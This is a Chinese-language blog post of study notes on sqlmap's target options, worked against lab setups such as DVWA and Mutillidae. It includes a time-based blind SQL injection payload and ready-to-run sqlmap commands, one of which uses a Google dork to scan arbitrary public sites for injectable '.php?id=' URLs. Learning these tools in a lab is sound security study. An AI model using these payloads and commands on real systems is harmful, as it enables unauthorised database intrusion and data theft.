sqlmap自动注入1(Target完整的超级详细 如有错误望指出)

SQLmap的自动注入学习之路(1)

是通过五种sql注入漏洞的检测技术

' and(select*from(select(sleep(20)))a)#

 

这是基于时间的盲注检测 看他返回的时间 可以在DVWA试试

sqlmap支持非常全面的()数据库管理系统DBMS

-d 参数直接连接 作为客服端连上服务器端

mysql 3306端口 orcle的1521   sqlsever的1433

我们先来查看一下sqlmap的版本

sqlmap.py --version

sqlmap.py -h(看参数)
               -hh(显示更详细的的参数)

 一Target(连接)

 

Sqlmap 针对关系型数据库的自动化注入工具,如mysql,mssql,oracle

由于DVWA需要cookie注入 所以我们换一个网站不需要登陆的网站

sqlmap.py -u "http://1192.168.1.101/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

-p是指定参数的注入 -f是指纹 这是最简单的扫描了

sqlmap.py -u “” -username -dbs -a

查看当前数据库的使用名 查看是否最高权限

这是数据库名 然后表名 然后列名

 

看这里就用了三种检测方法都可以注入

-d

sqlmap.py -d "mysql://root:toor@192.168.1.101:3306/dwva"

直连数据库的操作

-m也可以扫描list.txt文件 扫描txt里面的url

sqlmap.py -m list.txt --dbs

扫描google搜索结果

如果你想扫描url里面含有.php?id=1都去尝试注入

sqlmap.py -g "inurl:\".php?id=1\""

加下划线是转义的因为让电脑知道这个“”就是双引号本身

刚才上面的方法都是GET方法来检查传输的 所有的都是通过URL来进行传输的 如果是POST方法呐

1使用http的请求文件(burpsuit)

sqlmap.py -r request.txt(让他自己去http请求头里面找每一个参数进行注入)

接下来我们演示一下

复制下来 然后新建一个文本文件 post.txt然后把上面的内容粘贴进去

sqlmap.py -r post.txt --dbs

2使用burpsuit log文件

sqlmap.py -l log.txt

首先要配置一下我们访问过程中的log文件

有很多种 这里为了方便我们选代理类型的文件 然后选择存放位置保存为Log.txt凡是我的访问都会被放到log.txt里面

先识别到了一个url 1 然后问我们是否进行注入检测

 

因为时间过长 我们对username进行检查-p username

因为这里没有我们要的参数所以会报错

HTTPS

 sqlmap -u "url" -force-ssl

扫描配置文件

sqlmap -c sqlmap.conf

二Request

 切记(少就是多 慢就是快)

posted @ 2019-05-12 14:19  yourse1f  阅读(1286)  评论(0编辑  收藏  举报